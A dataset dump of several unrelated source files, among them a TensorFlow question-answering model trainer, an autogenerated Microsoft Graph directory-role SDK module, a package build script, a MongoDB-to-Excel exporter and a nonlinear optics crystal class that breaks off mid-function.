self.gstep = tf.Variable(0, dtype=tf.int32,
trainable=False, name='global_step')
self.lstm_hidden_size = 100
self.vocabulary = vocabulary
self.handle = tf.placeholder(tf.string, shape=[])
self.keep_prob = tf.placeholder(tf.float32, shape=[])
self.train_max_context_length = 744
self.train_max_question_length = 60
def encoder(self, embeddings, lengths, hidden_size, keep_prob=1.0):
return bilstm(embeddings, lengths, hidden_size, keep_prob)
def pred(self):
with tf.variable_scope("embedding_layer"):
(self.questions, question_lengths), (self.contexts,
context_lengths), self.answers = self.iterator.get_next()
#max_context_length = tf.reduce_max(context_lengths)
#max_question_length = tf.reduce_max(question_lengths)
max_context_length = self.train_max_context_length
max_question_length = self.train_max_question_length
context_mask = tf.sequence_mask(
context_lengths, maxlen=max_context_length)
question_mask = tf.sequence_mask(
question_lengths, maxlen=max_question_length)
question_embeddings = tf.nn.embedding_lookup(
self.embedding, self.questions)
context_embeddings = tf.nn.embedding_lookup(
self.embedding, self.contexts)
print('question_embeddings',
question_embeddings.get_shape().as_list())
print('context_embeddings',
context_embeddings.get_shape().as_list())
with tf.variable_scope("embedding_layer"):
context_output = residual_block(context_embeddings,
num_blocks=1,
num_conv_layers=4,
kernel_size=7,
mask=context_mask,
num_filters=self.lstm_hidden_size,
num_heads=1,
seq_len=max_context_length,
scope="Encoder_Residual_Block",
bias=False,
dropout=1.0 - self.keep_prob)
print('context_output',
context_output.get_shape().as_list())
question_output = residual_block(question_embeddings,
num_blocks=1,
num_conv_layers=4,
kernel_size=7,
mask=question_mask,
num_filters=self.lstm_hidden_size,
num_heads=1,
seq_len=max_question_length,
scope="Encoder_Residual_Block",
reuse=True, # Share the weights between passage and question
bias=False,
dropout=1.0 - self.keep_prob)
print('question_output',
question_output.get_shape().as_list())
# context_output dimension is BS * max_context_length * d
# where d = 2*lstm_hidden_size
with tf.variable_scope("attention_layer"):
# d is equal to 2*self.lstm_hidden_size
similarity_matrix = tf.matmul(context_output, tf.transpose(
question_output, [0, 2, 1]))
print('similarity_matrix', similarity_matrix.get_shape().as_list())
mask_aug = tf.expand_dims(
context_mask, 2) & tf.expand_dims(question_mask, 1)
similarity_matrix = preprocess_softmax(
similarity_matrix, mask_aug)
print('similarity_matrix', similarity_matrix.get_shape().as_list())
context_to_query_attention_weights = tf.nn.softmax(
similarity_matrix, axis=2)
print('context_to_query_attention_weights',
context_to_query_attention_weights.get_shape().as_list())
context_to_query = tf.matmul(
context_to_query_attention_weights, question_output)
print('context_to_query', context_to_query.get_shape().as_list())
max_col_similarity = tf.reduce_max(similarity_matrix, axis=2)
print('max_col_similarity', max_col_similarity.get_shape().as_list())
b = tf.nn.softmax(max_col_similarity, axis=1)
print('b', b.get_shape().as_list())
b = tf.expand_dims(b, 1)
print('b', b.get_shape().as_list())
query_to_context = tf.matmul(b, context_output)
print('query_to_context',
query_to_context.get_shape().as_list())
context_output_with_context_to_query = context_output * context_to_query
print('context_output_with_context_to_query',
context_output_with_context_to_query.get_shape().as_list())
context_output_with_query_to_context = context_output * query_to_context
print('context_output_with_query_to_context',
context_output_with_query_to_context.get_shape().as_list())
attention = tf.concat([context_output, context_to_query,
context_output_with_context_to_query, context_output_with_query_to_context], axis=2)
print('attention', attention.get_shape().as_list())
with tf.variable_scope("modeling_layer"):
self.enc = [conv(attention, self.lstm_hidden_size,
name="input_projection")]
for i in range(3):
if i % 2 == 0: # dropout every 2 blocks
self.enc[i] = tf.nn.dropout(
self.enc[i], self.keep_prob)
self.enc.append(
residual_block(self.enc[i],
num_blocks=7,
num_conv_layers=2,
kernel_size=5,
mask=context_mask,
num_filters=self.lstm_hidden_size,
num_heads=1,
seq_len=max_context_length,
scope="Model_Encoder",
bias=False,
reuse=True if i > 0 else None,
dropout=1.0 - self.keep_prob)
)
print('self.enc[i]',
self.enc[i].get_shape().as_list())
with tf.variable_scope("output_layer_start"):
pred_start = tf.squeeze(conv(tf.concat(
[self.enc[1], self.enc[2]], axis=-1), 1, bias=False, name="start_pointer"), -1)
print('pred_start',
pred_start.get_shape().as_list())
self.pred_start = preprocess_softmax(pred_start, context_mask)
print('self.pred_start',
self.pred_start.get_shape().as_list())
with tf.variable_scope("output_layer_end"):
pred_end = tf.squeeze(conv(tf.concat(
[self.enc[1], self.enc[3]], axis=-1), 1, bias=False, name="end_pointer"), -1)
print('pred_end',
pred_end.get_shape().as_list())
self.pred_end = preprocess_softmax(pred_end, context_mask)
print('self.pred_end',
self.pred_end.get_shape().as_list())
self.preds = tf.transpose(
[tf.argmax(self.pred_start, axis=1), tf.argmax(self.pred_end, axis=1)])
def loss(self):
with tf.variable_scope("loss"):
loss_start = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.pred_start, labels=self.answers[:, 0])
loss_end = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.pred_end, labels=self.answers[:, 1])
self.total_loss = tf.reduce_mean(
loss_start) + tf.reduce_mean(loss_end)
def optimize(self):
self.opt = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(self.total_loss,
global_step=self.gstep)
def build(self):
self.get_data()
self.pred()
self.loss()
self.optimize()
def get_data(self):
padded_shapes = ((tf.TensorShape([self.train_max_question_length]), # question of unknown size
tf.TensorShape([])), # size(question)
(tf.TensorShape([self.train_max_context_length]), # context of unknown size
tf.TensorShape([])), # size(context)
tf.TensorShape([2]))
padding_values = ((0, 0), (0, 0), 0)
train_batch = self.train_dataset.padded_batch(
self.batch_size, padded_shapes=padded_shapes, padding_values=padding_values)
# train_evaluation = self.train_dataset.
train_eval_batch = self.train_dataset.shuffle(10000).padded_batch(
500, padded_shapes=padded_shapes, padding_values=padding_values)
val_batch = self.val_dataset.shuffle(10000).padded_batch(
500, padded_shapes=padded_shapes, padding_values=padding_values).prefetch(1)
# Create a one shot iterator over the zipped dataset
self.train_iterator = train_batch.make_initializable_iterator()
self.val_iterator = val_batch.make_initializable_iterator()
self.train_eval_iterator = train_eval_batch.make_initializable_iterator()
# self.iterator = train_batch.make_initializable_iterator()
self.iterator = tf.data.Iterator.from_string_handle(
self.handle, self.train_iterator.output_types, self.train_iterator.output_shapes)
def train(self, n_iters):
eval_step = 10
with tf.Session() as sess:
self.train_iterator_handle = sess.run(
self.train_iterator.string_handle())
self.val_iterator_handle = sess.run(
self.val_iterator.string_handle())
self.train_eval_iterator_handle = sess.run(
self.train_eval_iterator.string_handle())
sess.run(tf.global_variables_initializer())
# writer = tf.summary.FileWriter(
# 'graphs/attention1', sess.graph)
initial_step = self.gstep.eval()
sess.run(self.val_iterator.initializer)
sess.run(self.train_eval_iterator.initializer)
variables = tf.trainable_variables()
num_vars = np.sum([np.prod(v.get_shape().as_list())
for v in variables])
print("Number of variables in models: {}".format(num_vars))
for epoch in range(n_iters):
print("epoch #", epoch)
num_batches = int(67978.0 / self.batch_size)
progress = Progbar(target=num_batches)
sess.run(self.train_iterator.initializer)
index = 0
total_loss = 0
progress.update(index, [("training loss", total_loss)])
while True:
index += 1
try:
total_loss, opt = sess.run(
[self.total_loss, self.opt], feed_dict={self.handle: self.train_iterator_handle, self.keep_prob: 0.75}) # , options=options, run_metadata=run_metadata)
progress.update(index, [("training loss", total_loss)])
except tf.errors.OutOfRangeError:
break
print(
'evaluation on 500 training elements:')
preds, contexts, answers = sess.run([self.preds, self.contexts, self.answers], feed_dict={
self.handle: self.train_eval_iterator_handle, self.keep_prob: 1.0})
predictions = []
ground_truths = []
for i in range(len(preds)):
predictions.append(convert_indices_to_text(
self.vocabulary, contexts[i], preds[i, 0], preds[i, 1]))
ground_truths.append(convert_indices_to_text(
self.vocabulary, contexts[i], answers[i, 0], answers[i, 1]))
print(evaluate(predictions, ground_truths))
print(
'evaluation on 500 validation elements:')
preds, contexts, answers = sess.run([self.preds, self.contexts, self.answers], feed_dict={
self.handle: self.val_iterator_handle, self.keep_prob: 1.0})
predictions = []
ground_truths = []
for i in range(len(preds)):
predictions.append(convert_indices_to_text(
self.vocabulary, contexts[i], preds[i, 0], preds[i, 1]))
ground_truths.append(convert_indices_to_text(
self.vocabulary, contexts[i], answers[i, 0], answers[i, 1]))
print(evaluate(predictions, ground_truths))
predictions = []
ground_truths = []
# writer.close()
if __name__ == '__main__':
print("ok")
embedding = load_word_embeddings()
vocabulary = load_vocabulary()
# with tf.Session() as sess:
# z = sess.run([y])
# print('embedding', y.get_shape(), z)
# print("shapes", embedding.shape)
train_questions = with_length(create_dataset("train.ids.question"))
train_answers = create_dataset("train.span")
train_context = with_length(create_dataset("train.ids.context"))
train_dataset = tf.data.Dataset.zip(
(train_questions, train_context, train_answers))
val_questions = with_length(create_dataset("val.ids.question"))
val_answers = create_dataset("val.span")
val_context = with_length(create_dataset("val.ids.context"))
val_dataset = tf.data.Dataset.zip(
(val_questions, val_context, val_answers))
# with tf.Session() as sess:
# sess.run(iterator.initializer)
# x = iterator.get_next()
# a = sess.run([x])
# print(x.output_shapes, a)
machine = Baseline(train_dataset, val_dataset,
embedding, vocabulary, batch_size=32)
machine.build()
machine.train(10)
| [
"amaroukaci@MacBook-Pro-de-Amar.local"
] | amaroukaci@MacBook-Pro-de-Amar.local |
0ef8047e301f8b79d8060b4e0aa3ee0698f6838f | f8da830331428a8e1bbeadf23345f79f1750bd98 | /msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/operations/_directory_role_template_directory_role_template_operations.py | e7eb0324c20421ffb6c86524e22d669d23d9b2ee | [
"MIT"
] | permissive | ezkemboi/msgraph-cli | e023e1b7589461a738e42cbad691d9a0216b0779 | 2ceeb27acabf7cfa219c8a20238d8c7411b9e782 | refs/heads/main | 2023-02-12T13:45:03.402672 | 2021-01-07T11:33:54 | 2021-01-07T11:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,977 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class DirectoryRoleTemplateDirectoryRoleTemplateOperations(object):
"""DirectoryRoleTemplateDirectoryRoleTemplateOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~identity_directory_management.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_directory_role_template(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum65"]]]
select=None, # type: Optional[List[Union[str, "models.Enum66"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfDirectoryRoleTemplate"]
"""Get entities from directoryRoleTemplates.
Get entities from directoryRoleTemplates.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum65]
:param select: Select properties to be returned.
:type select: list[str or ~identity_directory_management.models.Enum66]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfDirectoryRoleTemplate or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~identity_directory_management.models.CollectionOfDirectoryRoleTemplate]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryRoleTemplate"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_directory_role_template.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfDirectoryRoleTemplate', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_directory_role_template.metadata = {'url': '/directoryRoleTemplates'} # type: ignore
def create_directory_role_template(
self,
id=None, # type: Optional[str]
deleted_date_time=None, # type: Optional[datetime.datetime]
description=None, # type: Optional[str]
display_name=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphDirectoryRoleTemplate"
"""Add new entity to directoryRoleTemplates.
Add new entity to directoryRoleTemplates.
:param id: Read-only.
:type id: str
:param deleted_date_time:
:type deleted_date_time: ~datetime.datetime
:param description: The description to set for the directory role. Read-only.
:type description: str
:param display_name: The display name to set for the directory role. Read-only.
:type display_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphDirectoryRoleTemplate, or the result of cls(response)
:rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryRoleTemplate
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphDirectoryRoleTemplate"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
_body = models.MicrosoftGraphDirectoryRoleTemplate(id=id, deleted_date_time=deleted_date_time, description=description, display_name=display_name)
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_directory_role_template.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
header_parameters['Accept'] = 'application/json'
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_body, 'MicrosoftGraphDirectoryRoleTemplate')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphDirectoryRoleTemplate', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_directory_role_template.metadata = {'url': '/directoryRoleTemplates'} # type: ignore
def get_directory_role_template(
self,
directory_role_template_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum67"]]]
expand=None, # type: Optional[List[str]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphDirectoryRoleTemplate"
"""Get entity from directoryRoleTemplates by key.
Get entity from directoryRoleTemplates by key.
:param directory_role_template_id: key: id of directoryRoleTemplate.
:type directory_role_template_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_directory_management.models.Enum67]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphDirectoryRoleTemplate, or the result of cls(response)
:rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryRoleTemplate
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphDirectoryRoleTemplate"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_directory_role_template.metadata['url'] # type: ignore
path_format_arguments = {
'directoryRoleTemplate-id': self._serialize.url("directory_role_template_id", directory_role_template_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
header_parameters['Accept'] = 'application/json'
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphDirectoryRoleTemplate', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_directory_role_template.metadata = {'url': '/directoryRoleTemplates/{directoryRoleTemplate-id}'} # type: ignore
def update_directory_role_template(
self,
directory_role_template_id, # type: str
id=None, # type: Optional[str]
deleted_date_time=None, # type: Optional[datetime.datetime]
description=None, # type: Optional[str]
display_name=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Update entity in directoryRoleTemplates.
Update entity in directoryRoleTemplates.
:param directory_role_template_id: key: id of directoryRoleTemplate.
:type directory_role_template_id: str
:param id: Read-only.
:type id: str
:param deleted_date_time:
:type deleted_date_time: ~datetime.datetime
:param description: The description to set for the directory role. Read-only.
:type description: str
:param display_name: The display name to set for the directory role. Read-only.
:type display_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
_body = models.MicrosoftGraphDirectoryRoleTemplate(id=id, deleted_date_time=deleted_date_time, description=description, display_name=display_name)
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_directory_role_template.metadata['url'] # type: ignore
path_format_arguments = {
'directoryRoleTemplate-id': self._serialize.url("directory_role_template_id", directory_role_template_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_body, 'MicrosoftGraphDirectoryRoleTemplate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_directory_role_template.metadata = {'url': '/directoryRoleTemplates/{directoryRoleTemplate-id}'} # type: ignore
def delete_directory_role_template(
self,
directory_role_template_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete entity from directoryRoleTemplates.
Delete entity from directoryRoleTemplates.
:param directory_role_template_id: key: id of directoryRoleTemplate.
:type directory_role_template_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_directory_role_template.metadata['url'] # type: ignore
path_format_arguments = {
'directoryRoleTemplate-id': self._serialize.url("directory_role_template_id", directory_role_template_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_directory_role_template.metadata = {'url': '/directoryRoleTemplates/{directoryRoleTemplate-id}'} # type: ignore
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
f55900e54ef00863d8b784cba0e718dd5da9d58b | e00d41c9f4045b6c6f36c0494f92cad2bec771e2 | /hardware/misc/redshift/actions.py | f3306205d733debeae52481a7ff60929d4d62998 | [] | no_license | pisilinux/main | c40093a5ec9275c771eb5fb47a323e308440efef | bfe45a2e84ea43608e77fb9ffad1bf9850048f02 | refs/heads/master | 2023-08-19T00:17:14.685830 | 2023-08-18T20:06:02 | 2023-08-18T20:06:02 | 37,426,721 | 94 | 295 | null | 2023-09-14T08:22:22 | 2015-06-14T19:38:36 | Python | UTF-8 | Python | false | false | 948 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
#shelltools.export("PYTHON", "/usr/bin/python3.6")
autotools.configure("--sysconfdir=/etc \
--enable-drm \
--enable-geoclue2 \
--enable-randr \
--enable-vidmode \
--with-systemduserunitdir=/usr/lib/systemd/user")
pisitools.dosed("libtool", " -shared ", " -Wl,-O1,--as-needed -shared ")
def build():
autotools.make()
def install():
#autotools.install()
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("CONTRIB*", "COPYING", "README*")
| [
"muscnsl@hotmail.com"
] | muscnsl@hotmail.com |
55643a0d93c4f29688a49a0228d26ac0e38d1ca6 | be98d0d6301b93523207e9be4d35e9c0cc9fc566 | /shopnt/prod_to_xls.py | c6236501993cb69d1637b0c302088eb4afa23baf | [] | no_license | teacherSsamko/crawler | a0d9028665c4f5533fc739bf869f803ba814ff4d | 1cd4a3c4c5140d015f49f444ec08321ad6ad24d4 | refs/heads/main | 2023-02-23T23:23:56.122758 | 2021-01-31T23:59:53 | 2021-01-31T23:59:53 | 323,949,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | import os
import datetime
from openpyxl import Workbook, load_workbook
from pymongo import MongoClient
mongo = MongoClient("mongodb://localhost:27017")
db = mongo['aircode']
col = db['shopnt_prod']
today = datetime.date.today()
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
prod_xls = Workbook()
rows = []
title_row = ['prod_id','prod_name','price','score','score_persons','img_url']
rows.append(title_row)
data_rows = list(col.find())
for row in data_rows:
db_row = []
db_row.append(row['prod_id'])
db_row.append(row['prod_name'])
db_row.append(row['price'])
db_row.append(row['score'])
db_row.append(row['score_persons'])
db_row.append(row['img_url'])
rows.append(db_row)
for row in rows:
prod_xls.active.append(row)
prod_xls.save(os.path.join(BASE_DIR, f'prods_{today}.xlsx')) | [
"ssamko@gdflab.com"
] | ssamko@gdflab.com |
5d6bc8f73dad42c04c8512ac6b4eb900548dd9ef | c089ca6a1dbb4c4a9ed039adf3a3d0f768039209 | /factory/client.py | 0444831104c4aa4cca87558ab6ae586cd030112e | [] | no_license | shubham-chhimpa/design-pattern-python-3 | 3e98f2c742935b39e29ede7a3acf58ceb716e097 | 939d0455a26a7a723c73dd042df20def3c5d68a9 | refs/heads/main | 2023-07-01T17:02:05.705384 | 2021-08-01T13:49:46 | 2021-08-01T13:49:46 | 391,400,536 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from factory.chair import Chair
from factory.chair_factory import ChairFactory, ChairType
if __name__ == '__main__':
chair: Chair = ChairFactory.get_chair(ChairType.BIG)
print(chair.get_dimension())
| [
"chhimpa.shubh04@gmail.com"
] | chhimpa.shubh04@gmail.com |
b81c1c5060c9040565fb0e296101b4a288efed15 | c4f4e59e998a093b7a005323ee36a0ab1ed2738c | /NLO_simulation/src/genericCrystal.py | b1f9108a77c52a6a018871e68e5cb4c08adce1d4 | [] | no_license | patinkaew/slac_mec | 98a4842fda0685166108f984dc2504e7864ed6c9 | bdce4135a8a0617d2dd41ee80309b7d6f2d698bb | refs/heads/master | 2022-11-12T10:24:48.988523 | 2020-06-25T02:54:35 | 2020-06-25T02:54:35 | 274,289,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,129 | py | import numpy as np
from pandas import read_csv, DataFrame
import collections
from pynlo.media.crystals.CrystalContainer import Crystal
from utils import *
class genericCrystal(Crystal):
def __init__(self, data = {}):
super().__init__(data) # only contains length and enable_catching
self.data = collections.defaultdict(float, data)
self.process_data()
def process_data(self):
# general information
self.name = self.data['name']
self.temp = self.data['temperature']
self.mode = self.data['mode']
# refractive index, assuming function n(wavelength_nm, temperature)
self.n_o = self.data['n_o'] # ordinary axis
self.n_e = self.data['n_e'] # extraordinary axis
# refractive index
self.n2 = self.data['n2'] # nonlinear refractive index
self.theta = self.data['theta'] # phase matching mixing angle
self.deff = self.data['deff'] #
def load_crystal_data(self, filename): # load data from csv file
# TODO: finish this
df = read_csv(filename, sep = ',', index_col = 0)
df.fillna('')
# def parse_unit_conversion(df, parameter, value, to_unit):
# read = df.loc[parameter, value]
# from_unit = df.loc[parameter, 'unit']
# return convert_unit(read, from_unit, to_unit)
df.set_index('parameter', drop=True, inplace=True)
df.to_dict(orient = 'list')
self.process_data()
def set_mixing_angle(self, angle):
self.theta = angle
def set_temperature(self, temperature):
self.temp = temperature
def mix_refractive_index(self, n_o, n_e):
return n_o*n_e / np.sqrt(n_o**2 * np.sin(self.theta)**2 + n_e**2 * np.cos(self.theta)**2)
def n_mix(self, wavelength_nm, temperature):
n_o = self.n_o(wavelength_nm, self.temp)
n_e = self.n_e(wavelength_nm, self.temp)
return self.mix_refractive_index(n_o, n_e)
def refractive_index(self, wavelength_nm, axis = 'mix'):
# sellmeier and temperature-dispersion equations
n_o = self.n_o(wavelength_nm, self.temp)
n_e = self.n_e(wavelength_nm, self.temp)
n_mix = self.mix_refractive_index(n_o, n_e)
if axis == 'o':
return n_o
elif axis == 'e':
return n_e
elif axis == 'all':
return n_o, n_e, n_mix
else: # default to mix
return n_mix
def n(self, wl_nm, axis = 'mix'): # wrapper for refractive index
return self.refractive_index(wl_nm, axis)
# pynlo's original phasematch function
def phasematch(self, pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, return_wavelength = False):
RET_WL = False
new_wl = 0.0
if pump_wl_nm is None:
pump_wl_nm = 1.0/(1.0/idlr_wl_nm + 1.0/sgnl_wl_nm)
print('Setting pump to ',pump_wl_nm )
RET_WL = True
new_wl = pump_wl_nm
if sgnl_wl_nm is None:
sgnl_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/idlr_wl_nm)
print('Setting signal to ',sgnl_wl_nm)
RET_WL = True
new_wl = sgnl_wl_nm
if idlr_wl_nm is None:
idlr_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/sgnl_wl_nm)
print('Setting idler to ',idlr_wl_nm)
RET_WL = True
new_wl = idlr_wl_nm
kp_0 = 2*np.pi/pump_wl_nm
ks = self.n(sgnl_wl_nm, axis = 'o')*2*np.pi/sgnl_wl_nm
ki = self.n(idlr_wl_nm, axis = 'o')*2*np.pi/idlr_wl_nm
n_soln = (ks+ki) / kp_0
n_o, n_e, n_mix = self.n(pump_wl_nm, 'all')
print('n_e @ pump: ',n_e, '\n n_o @ pump: ',n_o, ';\t n_mix @ pump: ', n_mix)
a = n_e**2 - n_o**2
b = 0.0
